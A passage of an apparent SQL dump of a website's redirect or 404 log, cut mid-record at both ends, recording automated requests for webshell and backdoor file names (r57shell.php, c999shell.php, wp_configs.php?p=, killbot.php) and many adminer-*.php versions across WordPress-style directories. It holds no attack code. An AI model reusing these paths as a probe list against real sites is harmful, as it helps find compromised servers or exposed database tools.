00:00:00',301),(54137,'http://3s-technologies.com.tr/en/wp-includes/media-blogs.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:42:31','0000-00-00 00:00:00',301),(54138,'http://3s-technologies.com.tr/en/wp-admin/css/colors/wp_configs.php?p=',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:32','0000-00-00 00:00:00',301),(54139,'http://3s-technologies.com.tr/en/wp-includes/pomo/ftp_nb_fget.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:33','0000-00-00 00:00:00',301),(54140,'http://3s-technologies.com.tr/en/wp-admin/css/wp_configs.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:42:34','0000-00-00 00:00:00',301),(54141,'http://3s-technologies.com.tr/en/wp-content/languages/ru_ru_lite.mo.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:42:35','0000-00-00 00:00:00',301),(54142,'http://3s-technologies.com.tr/en/wp-includes/class-wp-simplepie-sanitize-kses-stream.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:36','0000-00-00 00:00:00',301),(54143,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ectoplasm/admin.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:37','0000-00-00 00:00:00',301),(54144,'http://3s-technologies.com.tr/en/wp-content/languages/admin-network-tr_tr.l10n.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:42:38','0000-00-00 00:00:00',301),(54145,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/custom-html-widgets.js.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:42:38','0000-00-00 00:00:00',301),(54146,'http://3s-technologies.com.tr/en/wp-includes/pomo/user-new.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:42:40','0000-00-00 00:00:00',301),(54147,'http://3s-technologies.com.tr/en/uploads/slot-gacor-uang-asli.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:42:41','0000-00-00 00:00:00',301),(54148,'http://3s-technologies.com.tr/en/wp-includes/phpmailer/send.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:42','0000-00-00 00:00:00',301),(54149,'http://3s-technologies.com.tr/en/wp-includes/carson.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:42:44','0000-00-00 00:00:00',301),(54150,'http://3s-technologies.com.tr/en/wp-admin/maint/alfa-rex.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:42:45','0000-00-00 00:00:00',301),(54151,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/colors.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:46','0000-00-00 00:00:00',301),(54152,'http://3s-technologies.com.tr/en/wp-admin/maint/wp_configs.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:42:47','0000-00-00 00:00:00',301),(54153,'http://3s-technologies.com.tr/en/.well-known/wp_configs.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:42:47','0000-00-00 00:00:00',301),(54154,'http://3s-technologies.com.tr/en/images/wp_configs.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:42:48','0000-00-00 00:00:00',301),(54155,'http://3s-technologies.com.tr/en/wp-content/plugins/watch/bop.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:42:49','0000-00-00 00:00:00',301),(54156,'http://3s-technologies.com.tr/en/wp-content/bop.php?p=',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:50','0000-00-00 00:00:00',301),(54157,'http://3s-technologies.com.tr/en/wp-admin/bop.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:42:51','0000-00-00 00:00:00',301),(54158,'http://3s-technologies.com.tr/en/wp-admin/images/wp-sys.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:42:52','0000-00-00 00:00:00',301),(54159,'http://3s-technologies.com.tr/en/wp-admin/includes/wp-sys.php?p=',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:42:53','0000-00-00 00:00:00',301),(54160,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/wp-sys.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:42:53','0000-00-00 00:00:00',301),(54161,'http://3s-technologies.com.tr/en/wp-admin/js/wp-sys.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:42:54','0000-00-00 00:00:00',301),(54162,'http://3s-technologies.com.tr/en/wp-admin/maint/wp-sys.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:42:55','0000-00-00 00:00:00',301),(54163,'http://3s-technologies.com.tr/en/wp-admin/network/wp-sys.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:42:56','0000-00-00 00:00:00',301),(54164,'http://3s-technologies.com.tr/en/wp-admin/user/wp-sys.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:42:57','0000-00-00 00:00:00',301),(54165,'http://3s-technologies.com.tr/en/wp-content/wp-sys.php?p=',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:42:58','0000-00-00 00:00:00',301),(54166,'http://3s-technologies.com.tr/en/wp-content/uploads/wp-sys.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:42:59','0000-00-00 00:00:00',301),(54167,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-sys.php?p=',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:43:00','0000-00-00 00:00:00',301),(54168,'http://3s-technologies.com.tr/en/wp-content/languages/wp-sys.php?p=',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:43:01','0000-00-00 00:00:00',301),(54169,'http://3s-technologies.com.tr/en/wp-content/languages/themes/wp-sys.php?p=',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:43:02','0000-00-00 00:00:00',301),(54170,'http://3s-technologies.com.tr/en/wp-includes/simplepie/wp-sys.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:03','0000-00-00 00:00:00',301),(54171,'http://3s-technologies.com.tr/en/wp-includes/certificates/wp-sys.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:43:04','0000-00-00 00:00:00',301),(54172,'http://3s-technologies.com.tr/en/wp-includes/customize/wp-sys.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:43:04','0000-00-00 00:00:00',301),(54173,'http://3s-technologies.com.tr/en/wp-includes/pomo/wp-sys.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:43:05','0000-00-00 00:00:00',301),(54174,'http://3s-technologies.com.tr/en/wp-includes/rest-api/wp-sys.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:43:06','0000-00-00 00:00:00',301),(54175,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/wp-sys.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:07','0000-00-00 00:00:00',301),(54176,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/wp-sys.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:08','0000-00-00 00:00:00',301),(54177,'http://3s-technologies.com.tr/en/.well-known/wp-sys.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:43:09','0000-00-00 00:00:00',301),(54178,'http://3s-technologies.com.tr/en/index/wp-sys.php?p=',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:43:10','0000-00-00 00:00:00',301),(54179,'http://3s-technologies.com.tr/en/about/wp-sys.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:43:11','0000-00-00 00:00:00',301),(54180,'http://3s-technologies.com.tr/en/as/wp-sys.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:11','0000-00-00 00:00:00',301),(54181,'http://3s-technologies.com.tr/en/file/wp-sys.php?p=',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:43:12','0000-00-00 00:00:00',301),(54182,'http://3s-technologies.com.tr/en/chosen/wp-sys.php?p=',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:43:13','0000-00-00 00:00:00',301),(54183,'http://3s-technologies.com.tr/en/css/wp-sys.php?p=',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:43:14','0000-00-00 00:00:00',301),(54184,'http://3s-technologies.com.tr/en/doc/wp-sys.php?p=',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:43:15','0000-00-00 00:00:00',301),(54185,'http://3s-technologies.com.tr/en/admin/wp-sys.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:16','0000-00-00 00:00:00',301),(54186,'http://3s-technologies.com.tr/en/mah/wp-sys.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:17','0000-00-00 00:00:00',301),(54187,'http://3s-technologies.com.tr/en/plugins/wp-sys.php?p=',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:43:17','0000-00-00 00:00:00',301),(54188,'http://3s-technologies.com.tr/en/client/sinchro-advisory/wp-sys.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:18','0000-00-00 00:00:00',301),(54189,'http://3s-technologies.com.tr/en/wp-content/plugins/wordpress_dev/wp_error.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:43:19','0000-00-00 00:00:00',301),(54190,'http://3s-technologies.com.tr/en/wp-admin/images/wp_error.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:43:20','0000-00-00 00:00:00',301),(54191,'http://3s-technologies.com.tr/en/wp-admin/includes/wp_error.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:43:21','0000-00-00 00:00:00',301),(54192,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/wp_error.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:43:22','0000-00-00 00:00:00',301),(54193,'http://3s-technologies.com.tr/en/wp-admin/js/wp_error.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:43:23','0000-00-00 00:00:00',301),(54194,'http://3s-technologies.com.tr/en/wp-admin/maint/wp_error.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:43:24','0000-00-00 00:00:00',301),(54195,'http://3s-technologies.com.tr/en/wp-admin/network/wp_error.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:43:24','0000-00-00 00:00:00',301),(54196,'http://3s-technologies.com.tr/en/wp-admin/user/wp_error.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:25','0000-00-00 00:00:00',301),(54197,'http://3s-technologies.com.tr/en/wp-content/wp_error.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:43:26','0000-00-00 00:00:00',301),(54198,'http://3s-technologies.com.tr/en/wp-content/uploads/wp_error.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:27','0000-00-00 00:00:00',301),(54199,'http://3s-technologies.com.tr/en/wp-content/plugins/wp_error.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:28','0000-00-00 00:00:00',301),(54200,'http://3s-technologies.com.tr/en/wp-content/languages/wp_error.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:29','0000-00-00 00:00:00',301),(54201,'http://3s-technologies.com.tr/en/wp-content/languages/themes/wp_error.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:30','0000-00-00 00:00:00',301),(54202,'http://3s-technologies.com.tr/en/wp-includes/simplepie/wp_error.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:43:31','0000-00-00 00:00:00',301),(54203,'http://3s-technologies.com.tr/en/wp-includes/certificates/wp_error.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:43:31','0000-00-00 00:00:00',301),(54204,'http://3s-technologies.com.tr/en/wp-includes/customize/wp_error.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:43:32','0000-00-00 00:00:00',301),(54205,'http://3s-technologies.com.tr/en/wp-includes/pomo/wp_error.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:43:33','0000-00-00 00:00:00',301),(54206,'http://3s-technologies.com.tr/en/wp-includes/rest-api/wp_error.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:34','0000-00-00 00:00:00',301),(54207,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/wp_error.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:35','0000-00-00 00:00:00',301),(54208,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/wp_error.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:36','0000-00-00 00:00:00',301),(54209,'http://3s-technologies.com.tr/en/.well-known/wp_error.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:37','0000-00-00 00:00:00',301),(54210,'http://3s-technologies.com.tr/en/index/wp_error.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:43:38','0000-00-00 00:00:00',301),(54211,'http://3s-technologies.com.tr/en/about/wp_error.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:39','0000-00-00 00:00:00',301),(54212,'http://3s-technologies.com.tr/en/as/wp_error.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:40','0000-00-00 00:00:00',301),(54213,'http://3s-technologies.com.tr/en/file/wp_error.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:43:41','0000-00-00 00:00:00',301),(54214,'http://3s-technologies.com.tr/en/chosen/wp_error.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:41','0000-00-00 00:00:00',301),(54215,'http://3s-technologies.com.tr/en/css/wp_error.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:43:42','0000-00-00 00:00:00',301),(54216,'http://3s-technologies.com.tr/en/doc/wp_error.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:43:43','0000-00-00 00:00:00',301),(54217,'http://3s-technologies.com.tr/en/admin/wp_error.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:44','0000-00-00 00:00:00',301),(54218,'http://3s-technologies.com.tr/en/mah/wp_error.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:45','0000-00-00 00:00:00',301),(54219,'http://3s-technologies.com.tr/en/plugins/wp_error.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:43:46','0000-00-00 00:00:00',301),(54220,'http://3s-technologies.com.tr/en/client/sinchro-advisory/wp_error.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:43:47','0000-00-00 00:00:00',301),(54221,'http://3s-technologies.com.tr/en/wp-admin/includes/bop.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:47','0000-00-00 00:00:00',301),(54222,'http://3s-technologies.com.tr/en/wp-content/themes/bop.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:43:48','0000-00-00 00:00:00',301),(54223,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/bop.php?p=',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:43:49','0000-00-00 00:00:00',301),(54224,'http://3s-technologies.com.tr/en/wp-admin/css/colors/bop.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:43:50','0000-00-00 00:00:00',301),(54225,'http://3s-technologies.com.tr/en/wp-admin/css/bop.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:51','0000-00-00 00:00:00',301),(54226,'http://3s-technologies.com.tr/en/wp-admin/maint/bop.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:52','0000-00-00 00:00:00',301),(54227,'http://3s-technologies.com.tr/en/.well-known/bop.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:43:53','0000-00-00 00:00:00',301),(54228,'http://3s-technologies.com.tr/en/images/bop.php?p=',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:54','0000-00-00 00:00:00',301),(54229,'http://3s-technologies.com.tr/en/wp-includes/css/bop.php?p=',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:43:55','0000-00-00 00:00:00',301),(54230,'http://3s-technologies.com.tr/en/wp-includes/css/wp_configs.php?p=',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:43:56','0000-00-00 00:00:00',301),(54231,'http://3s-technologies.com.tr/en/wp-admin/includes/a.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:57','0000-00-00 00:00:00',301),(54232,'http://3s-technologies.com.tr/en/wp-admin/css/a.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:43:59','0000-00-00 00:00:00',301),(54233,'http://3s-technologies.com.tr/en/gray.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:44:02','0000-00-00 00:00:00',301),(54234,'http://3s-technologies.com.tr/en/c0derz_shell.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:44:10','0000-00-00 00:00:00',301),(54235,'http://3s-technologies.com.tr/en/simple_php_backdoor.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:44:14','0000-00-00 00:00:00',301),(54236,'http://3s-technologies.com.tr/en/r57shell.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:44:17','0000-00-00 00:00:00',301),(54237,'http://3s-technologies.com.tr/en/wp-includes/ixr/bnet.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:44:19','0000-00-00 00:00:00',301),(54238,'http://3s-technologies.com.tr/en/wp-admin/maint/wp-cron.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:44:27','0000-00-00 00:00:00',301),(54239,'http://3s-technologies.com.tr/en/wp-admin/maint/wp-readindex.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:44:29','0000-00-00 00:00:00',301),(54240,'http://3s-technologies.com.tr/en/wp-admin/css/colors/ectoplasm/uwer.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:44:30','0000-00-00 00:00:00',301),(54241,'http://3s-technologies.com.tr/en/kanghoax.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:44:34','0000-00-00 00:00:00',301),(54242,'http://3s-technologies.com.tr/en/langar.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:44:35','0000-00-00 00:00:00',301),(54243,'http://3s-technologies.com.tr/en/webshell.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:44:37','0000-00-00 00:00:00',301),(54244,'http://3s-technologies.com.tr/en/shankar.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:44:39','0000-00-00 00:00:00',301),(54245,'http://3s-technologies.com.tr/en/sincap.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:44:40','0000-00-00 00:00:00',301),(54246,'http://3s-technologies.com.tr/en/w3d.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:44:43','0000-00-00 00:00:00',301),(54247,'http://3s-technologies.com.tr/en/simple_php_backdoor_by_dk.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:44:50','0000-00-00 00:00:00',301),(54248,'http://3s-technologies.com.tr/en/bitwise.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:44:52','0000-00-00 00:00:00',301),(54249,'http://3s-technologies.com.tr/en/c999shell.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:44:53','0000-00-00 00:00:00',301),(54250,'http://3s-technologies.com.tr/en/robot.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:44:58','0000-00-00 00:00:00',301),(54251,'http://3s-technologies.com.tr/en/simple_cmd.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:44:58','0000-00-00 00:00:00',301),(54252,'http://3s-technologies.com.tr/en/sure.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:44:59','0000-00-00 00:00:00',301),(54253,'http://3s-technologies.com.tr/en/sys32.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:45:00','0000-00-00 00:00:00',301),(54254,'http://3s-technologies.com.tr/en/uploading.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:45:01','0000-00-00 00:00:00',301),(54255,'http://3s-technologies.com.tr/en/wp-content/plugins/aryabot/upx.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:45:04','0000-00-00 00:00:00',301),(54256,'http://3s-technologies.com.tr/en/wp-content/plugins/aryabot/wawe.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:45:05','0000-00-00 00:00:00',301),(54257,'http://3s-technologies.com.tr/en/wp-content/plugins/aryabot/byps.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:45:05','0000-00-00 00:00:00',301),(54258,'http://3s-technologies.com.tr/en/who.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:45:06','0000-00-00 00:00:00',301),(54259,'http://3s-technologies.com.tr/en/daes.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:45:07','0000-00-00 00:00:00',301),(54260,'http://3s-technologies.com.tr/en/404webshell.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:45:11','0000-00-00 00:00:00',301),(54261,'http://3s-technologies.com.tr/en/stfu.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:45:12','0000-00-00 00:00:00',301),(54262,'http://3s-technologies.com.tr/en/killbot.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:45:13','0000-00-00 00:00:00',301),(54263,'http://3s-technologies.com.tr/en/wp-admin/images/killbot.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:45:14','0000-00-00 00:00:00',301),(54264,'http://3s-technologies.com.tr/en/wp-admin/includes/killbot.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:45:15','0000-00-00 00:00:00',301),(54265,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/killbot.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:45:16','0000-00-00 00:00:00',301),(54266,'http://3s-technologies.com.tr/en/wp-admin/js/killbot.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:45:17','0000-00-00 00:00:00',301),(54267,'http://3s-technologies.com.tr/en/wp-admin/maint/killbot.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:45:18','0000-00-00 00:00:00',301),(54268,'http://3s-technologies.com.tr/en/wp-admin/network/killbot.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:45:18','0000-00-00 00:00:00',301),(54269,'http://3s-technologies.com.tr/en/wp-admin/user/killbot.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:45:19','0000-00-00 00:00:00',301),(54270,'http://3s-technologies.com.tr/en/wp-content/killbot.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:45:20','0000-00-00 00:00:00',301),(54271,'http://3s-technologies.com.tr/en/wp-content/uploads/killbot.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:45:22','0000-00-00 00:00:00',301),(54272,'http://3s-technologies.com.tr/en/wp-content/plugins/killbot.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:45:23','0000-00-00 00:00:00',301),(54273,'http://3s-technologies.com.tr/en/wp-content/languages/killbot.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:45:23','0000-00-00 00:00:00',301),(54274,'http://3s-technologies.com.tr/en/wp-content/languages/themes/killbot.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:45:24','0000-00-00 00:00:00',301),(54275,'http://3s-technologies.com.tr/en/wp-includes/simplepie/killbot.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:45:25','0000-00-00 00:00:00',301),(54276,'http://3s-technologies.com.tr/en/wp-includes/certificates/killbot.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:45:26','0000-00-00 00:00:00',301),(54277,'http://3s-technologies.com.tr/en/wp-includes/customize/killbot.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:45:27','0000-00-00 00:00:00',301),(54278,'http://3s-technologies.com.tr/en/index/killbot.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:45:28','0000-00-00 00:00:00',301),(54279,'http://3s-technologies.com.tr/en/about/killbot.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:45:29','0000-00-00 00:00:00',301),(54280,'http://3s-technologies.com.tr/en/as/killbot.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:45:30','0000-00-00 00:00:00',301),(54281,'http://3s-technologies.com.tr/en/file/killbot.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:45:31','0000-00-00 00:00:00',301),(54282,'http://3s-technologies.com.tr/en/chosen/killbot.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:45:32','0000-00-00 00:00:00',301),(54283,'https://3s-technologies.com.tr/tr/images/global/lfs1photo.gif',NULL,'','',1,0,'2025-12-20 05:50:35','0000-00-00 00:00:00',301),(54284,'http://3s-technologies.com.tr/tr/adminer-3.5.1.php',NULL,'','',1,0,'2025-12-21 11:58:29','0000-00-00 00:00:00',301),(54285,'http://3s-technologies.com.tr/tr/adminer-3.5.0.php',NULL,'','',1,0,'2025-12-21 11:58:30','0000-00-00 00:00:00',301),(54286,'http://3s-technologies.com.tr/tr/adminer-4.2.4-en.php',NULL,'','',1,0,'2025-12-21 11:58:31','0000-00-00 00:00:00',301),(54287,'http://3s-technologies.com.tr/tr/adminer-3.4.0.php',NULL,'','',1,0,'2025-12-21 11:58:32','0000-00-00 00:00:00',301),(54288,'http://3s-technologies.com.tr/tr/adminer-3.3.4.php',NULL,'','',1,0,'2025-12-21 11:58:33','0000-00-00 00:00:00',301),(54289,'http://3s-technologies.com.tr/tr/adminer-3.3.3.php',NULL,'','',1,0,'2025-12-21 11:58:34','0000-00-00 00:00:00',301),(54290,'http://3s-technologies.com.tr/tr/adminer-4.2.5-en.php',NULL,'','',1,0,'2025-12-21 11:58:35','0000-00-00 00:00:00',301),(54291,'http://3s-technologies.com.tr/tr/adminer-3.3.2.php',NULL,'','',1,0,'2025-12-21 11:58:37','0000-00-00 00:00:00',301),(54292,'http://3s-technologies.com.tr/tr/adminer-3.3.1.php',NULL,'','',1,0,'2025-12-21 11:58:38','0000-00-00 00:00:00',301),(54293,'http://3s-technologies.com.tr/tr/adminer-3.3.0.php',NULL,'','',1,0,'2025-12-21 11:58:39','0000-00-00 00:00:00',301),(54294,'http://3s-technologies.com.tr/tr/adminer-4.3.0-en.php',NULL,'','',1,0,'2025-12-21 11:58:40','0000-00-00 00:00:00',301),(54295,'http://3s-technologies.com.tr/tr/adminer-3.2.2.php',NULL,'','',1,0,'2025-12-21 11:58:41','0000-00-00 00:00:00',301),(54296,'http://3s-technologies.com.tr/tr/adminer-3.2.1.php',NULL,'','',1,0,'2025-12-21 11:58:42','0000-00-00 00:00:00',301),(54297,'http://3s-technologies.com.tr/tr/adminer-3.2.0.php',NULL,'','',1,0,'2025-12-21 11:58:43','0000-00-00 00:00:00',301),(54298,'http://3s-technologies.com.tr/tr/adminer-4.3.1-en.php',NULL,'','',1,0,'2025-12-21 11:58:44','0000-00-00 00:00:00',301),(54299,'http://3s-technologies.com.tr/tr/adminer-3.1.0.php',NULL,'','',1,0,'2025-12-21 11:58:45','0000-00-00 00:00:00',301),(54300,'http://3s-technologies.com.tr/tr/adminer-3.0.1.php',NULL,'','',1,0,'2025-12-21 11:58:46','0000-00-00 00:00:00',301),(54301,'http://3s-technologies.com.tr/tr/adminer-3.0.0.php',NULL,'','',1,0,'2025-12-21 11:58:47','0000-00-00 00:00:00',301),(54302,'http://3s-technologies.com.tr/tr/adminer-4.4.0-en.php',NULL,'','',1,0,'2025-12-21 11:58:48','0000-00-00 00:00:00',301),(54303,'http://3s-technologies.com.tr/tr/adminer-4.5.0-en.php',NULL,'','',1,0,'2025-12-21 11:58:49','0000-00-00 00:00:00',301),(54304,'http://3s-technologies.com.tr/tr/adminer-4.6.0-en.php',NULL,'','',1,0,'2025-12-21 11:58:50','0000-00-00 00:00:00',301),(54305,'http://3s-technologies.com.tr/tr/adminer-4.6.1-en.php',NULL,'','',1,0,'2025-12-21 11:58:51','0000-00-00 00:00:00',301),(54306,'http://3s-technologies.com.tr/tr/adminer-4.6.2-en.php',NULL,'','',1,0,'2025-12-21 11:58:52','0000-00-00 00:00:00',301),(54307,'http://3s-technologies.com.tr/tr/adminer-4.6.3-en.php',NULL,'','',1,0,'2025-12-21 11:58:53','0000-00-00 00:00:00',301),(54308,'http://3s-technologies.com.tr/tr/yapgb.php',NULL,'','',2,0,'2025-12-21 11:58:54','0000-00-00 00:00:00',301),(54309,'http://3s-technologies.com.tr/tr/book.php',NULL,'','',2,0,'2025-12-21 11:58:55','0000-00-00 00:00:00',301),(54310,'http://3s-technologies.com.tr/tr/adminer-4.7.0-en.php',NULL,'','',1,0,'2025-12-21 11:58:56','0000-00-00 00:00:00',301),(54311,'http://3s-technologies.com.tr/tr/adminer-4.7.1-en.php',NULL,'','',1,0,'2025-12-21 11:58:57','0000-00-00 00:00:00',301),(54312,'http://3s-technologies.com.tr/tr/adminer-4.7.2-en.php',NULL,'','',1,0,'2025-12-21 11:58:58','0000-00-00 00:00:00',301),(54313,'http://3s-technologies.com.tr/tr/raiz0.php',NULL,'','',2,0,'2025-12-21 11:59:00','0000-00-00 00:00:00',301),(54314,'http://3s-technologies.com.tr/tr/mudxizxnc.php',NULL,'','',2,0,'2025-12-21 11:59:01','0000-00-00 00:00:00',301),(54315,'http://3s-technologies.com.tr/tr/adminer-4.7.3-en.php',NULL,'','',1,0,'2025-12-21 11:59:03','0000-00-00 00:00:00',301),(54316,'http://3s-technologies.com.tr/tr/adminer-4.7.4-en.php',NULL,'','',1,0,'2025-12-21 